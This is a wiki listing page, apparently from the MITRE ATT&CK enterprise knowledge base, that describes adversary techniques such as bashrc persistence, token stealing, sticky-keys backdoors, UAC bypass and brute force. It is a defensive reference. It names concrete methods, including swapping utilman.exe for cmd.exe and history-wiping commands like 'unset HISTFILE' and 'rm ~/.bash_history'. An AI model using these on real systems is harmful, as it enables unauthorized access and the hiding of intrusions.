169
U

Property:Has technical description

From enterprise
Jump to: navigation, search

This is a property of type Text.

Pages using the property "Has technical description"

Showing 25 pages using this property.

View (previous 25 | next 25) (20 | 50 | 100 | 250 | 500)

.
.bash_profile and .bashrc +<code>~/.bash_profile</code> and <code>~/.bashrc</code> are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly. <code>~/.bash_profile</code> is executed for login shells and <code>~/.bashrc</code> is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), <code>~/.bash_profile</code> is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, <code>~/.bashrc</code> is executed. This allows users more fine grained control over when they want certain commands executed. Mac's Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling <code>~/.bash_profile</code> each time instead of <code>~/.bashrc</code>. These files are meant to be written to by the local user to configure their own environment; however, adversaries can also insert code into these files to gain persistence each time a user logs in or opens a new shell.  +
A
Access Token Manipulation +Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. For example, Microsoft promotes the use of access tokens as a security best practice. Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command <code>runas</code>. [[CiteRef::Microsoft runas]] Adversaries may use access tokens to operate under a different user or system security context to perform actions and evade detection. An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level.[[CiteRef::Pentestlab Token Manipulation]] Adversaries can also create spoofed access tokens if they know the credentials of a user. Any standard user can use the <code>runas</code> command, and the Windows API functions, to do this; it does not require access to an administrator account. Lastly, an adversary can use a spoofed token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system. Metasploit’s Meterpreter payload allows arbitrary token stealing and uses token stealing to escalate privileges. [[CiteRef::Metasploit access token]] The Cobalt Strike beacon payload allows arbitrary token stealing and can also create tokens. [[CiteRef::Cobalt Strike Access Token]]  +
Accessibility Features +Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system. Two common accessibility programs are <code>C:\Windows\System32\sethc.exe</code>, launched when the shift key is pressed five times and <code>C:\Windows\System32\utilman.exe</code>, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen.[[CiteRef::FireEye Hikit Rootkit]] Depending on the version of Windows, an adversary may take advantage of these features in different ways because of code integrity enhancements. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in <code>%systemdir%\</code>, and it must be protected by Windows File or Resource Protection (WFP/WRP).[[CiteRef::DEFCON2016 Sticky Keys]] The debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. Examples for both methods: For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., <code>C:\Windows\System32\utilman.exe</code>) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [[Technique/T1076|Remote Desktop Protocol]] will cause the replaced file to be executed with SYSTEM privileges.[[CiteRef::Tilbury 2014]] For the debugger method on Windows Vista and later as well as Windows Server 2008 and later, for example, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for the accessibility program (e.g., "utilman.exe"). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with RDP will cause the "debugger" program to be executed with SYSTEM privileges.[[CiteRef::Tilbury 2014]] Other accessibility features exist that may also be leveraged in a similar fashion:[[CiteRef::DEFCON2016 Sticky Keys]] *On-Screen Keyboard: <code>C:\Windows\System32\osk.exe</code> *Magnifier: <code>C:\Windows\System32\Magnify.exe</code> *Narrator: <code>C:\Windows\System32\Narrator.exe</code> *Display Switcher: <code>C:\Windows\System32\DisplaySwitch.exe</code> *App Switcher: <code>C:\Windows\System32\AtBroker.exe</code>  +
Account Discovery +Adversaries may attempt to get a listing of local system or domain accounts. ===Windows=== Example commands that can acquire this information are <code>net user</code>, <code>net group <groupname></code>, and <code>net localgroup <groupname></code> using the [[Software/S0039|Net]] utility or through use of [[Software/S0105|dsquery]]. If adversaries attempt to identify the primary user, currently logged in user, or set of users that commonly uses a system, [[Technique/T1033|System Owner/User Discovery]] may apply. ===Mac=== On Mac, groups can be enumerated through the <code>groups</code> and <code>id</code> commands. In mac specifically, <code>dscl . list /Groups</code> and <code>dscacheutil -q group</code> can also be used to enumerate groups and users. ===Linux=== On Linux, local users can be enumerated through the use of the <code>/etc/passwd</code> file which is world readable. In mac, this same file is only used in single-user mode in addition to the <code>/etc/master.passwd</code> file. Also, groups can be enumerated through the <code>groups</code> and <code>id</code> commands. In mac specifically, <code>dscl . list /Groups</code> and <code>dscacheutil -q group</code> can also be used to enumerate groups and users.  +
Account Manipulation +Account manipulation may aid adversaries in maintaining access to credentials and certain permission levels within an environment. Manipulation could consist of modifying permissions, adding or changing permission groups, modifying account settings, or modifying how authentication is performed. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.  +
AppInit DLLs +DLLs that are specified in the AppInit_DLLs value in the Registry key <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program. This value can be abused to obtain persistence by causing a DLL to be loaded into most processes on the computer.[[CiteRef::AppInit Registry]] The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled.[[CiteRef::AppInit Secure Boot]]  +
AppleScript +macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the <code>osalang</code> program. AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. Adversaries can use this to interact with open SSH connection, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via python [[CiteRef::Macro Malware Targets Macs]]. Scripts can be run from the command lie via <code>osascript /path/to/script</code> or <code>osascript -e "script here"</code>.  +
Application Deployment Software +Adversaries may deploy malicious software to systems within a network using application deployment systems employed by enterprise administrators. The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the deployment server, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform software deployment. Access to a network-wide or enterprise-wide software deployment system enables an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.  +
Application Shimming +The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow compatibility of programs as Windows updates and changes its code. For example, application shimming feature that allows programs that were created for Windows XP to work with Windows 10. Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses API hooking to redirect the code as necessary in order to communicate with the OS. A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in: * <code>%WINDIR%\AppPatch\sysmain.sdb</code> * <code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb</code> Custom databases are stored in: * <code>%WINDIR%\AppPatch\custom & %WINDIR%\AppPatch\AppPatch64\Custom</code> * <code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom</code> To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [[Technique/T1088|Bypass User Account Control]] (UAC) (RedirectEXE), inject DLLs into processes (InjectDll), and intercept memory addresses (GetProcAddress). Utilizing these shims, an adversary can perform several malicious acts, such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc.  +
Application Window Discovery +Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger. In Mac, this can be done natively with a small [[Technique/T1155|AppleScript]] script.  +
Audio Capture +An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information. Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.  +
Authentication Package +Windows Authentication Package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.[[CiteRef::MSDN Authentication Packages]] Adversaries can use the autostart mechanism provided by LSA Authentication Packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=<target binary></code>. The binary will then be executed by the system when the authentication packages are loaded.  +
Automated Collection +Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of [[Technique/T1064|Scripting]] to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. This technique may incorporate use of other techniques such as [[Technique/T1083|File and Directory Discovery]] and [[Technique/T1105|Remote File Copy]] to identify and move files.  +
Automated Exfiltration +Data, such as sensitive documents, may be exfiltrated through the use of automated processing or [[Technique/T1064|Scripting]] after being gathered during [[Collection]]. When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [[Technique/T1041|Exfiltration Over Command and Control Channel]] and [[Technique/T1048|Exfiltration Over Alternative Protocol]].  +
B
Bash History +Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s <code>.bash_history</code> file. For each user, this file resides at the same location: <code>~/.bash_history</code>. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials.[[CiteRef::External to DA, the OS X Way]]  +
Binary Padding +Some security tools inspect files with static signatures to determine if they are known malicious. Adversaries may add data to files to increase the size beyond what security tools are capable of handling or to change the file hash to avoid hash-based blacklists.  +
Bootkit +A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR).[[CiteRef::MTrends 2016]] Adversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly. ===Master Boot Record=== The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code.[[CiteRef::Lau 2011]] ===Volume Boot Record=== The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.  +
Brute Force +Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained. [[Technique/T1003|Credential Dumping]] to obtain password hashes may only get an adversary so far when [[Technique/T1075|Pass the Hash]] is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table. Cracking hashes is usually done on adversary-controlled systems outside of the target network.[[CiteRef::Wikipedia Password cracking]] Adversaries may attempt to brute force logins without knowledge of passwords or hashes during an operation either with zero knowledge or by attempting a list of known or possible passwords. This is a riskier option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.[[CiteRef::Cylance Cleaver]] A related technique called password spraying uses one password, or a small list of passwords, that matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password and many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords.[[CiteRef::BlackHillsInfosec Password Spraying]]  +
Bypass User Account Control +Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.[[CiteRef::TechNet How UAC Works]] If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box.[[CiteRef::TechNet Inside UAC]][[CiteRef::MSDN COM Elevation]] An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.[[CiteRef::Davidson Windows]] Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected. Many methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods[[CiteRef::Github UACMe]] that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as: * <code>eventvwr.exe</code> can auto-elevate and execute a specified binary or script.[[CiteRef::enigma0x3 Fileless UAC Bypass]][[CiteRef::Fortinet Fareit]] Another bypass is possible through some [[Lateral Movement]] techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity.[[CiteRef::SANS UAC Bypass]]  +
C
Change Default File Association +When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access.[[CiteRef::Microsoft Change Default Programs]][[CiteRef::Microsoft File Handlers]] Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.  +
Clear Command History +macOS and Linux both keep track of the commands users type in their terminal so that users can easily remember what they've done. These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user's home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Since everything typed on the command-line is saved, passwords passed in on the command line are also saved. Adversaries can abuse this by searching these files for cleartext passwords. Additionally, adversaries can use a variety of methods to prevent their own commands from appear in these logs such as <code>unset HISTFILE</code>, <code>export HISTFILESIZE=0</code>, <code>history -c</code>, <code>rm ~/.bash_history</code>.  +
Clipboard Data +Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications. ===Windows=== Applications can access clipboard data by using the Windows API.[[CiteRef::MSDN Clipboard]] ===Mac=== OSX provides a native command, <code>pbpaste</code>, to grab clipboard contents [[CiteRef::Operating with EmPyre]].  +
Code Signing +Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with.[[CiteRef::Wikipedia Code Signing]] However, adversaries are known to use code signing certificates to masquerade malware and tools as legitimate binaries[[CiteRef::Janicab]]. The certificates used during an operation may be created, forged, or stolen by the adversary.[[CiteRef::Securelist Digital Certificates]][[CiteRef::Symantec Digital Certificates]] Code signing to verify software on first run can be used on modern Windows and MacOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform.[[CiteRef::Wikipedia Code Signing]] Code signing certificates may be used to bypass security policies that require signed code to execute on a system.  +
Command-Line Interface +Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms.[[CiteRef::Wikipedia Command-Line Interface]] One example command-line interface on Windows systems is [[Software/S0106|cmd]], which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. [[Technique/T1053|Scheduled Task]]). Adversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.  +
Commonly Used Port +Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. They may use commonly open ports such as * TCP:80 (HTTP) * TCP:443 (HTTPS) * TCP:25 (SMTP) * TCP/UDP:53 (DNS) They may use the protocol associated with the port or a completely different protocol. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), examples of common ports are * TCP/UDP:135 (RPC) * TCP/UDP:22 (SSH) * TCP/UDP:3389 (RDP)  +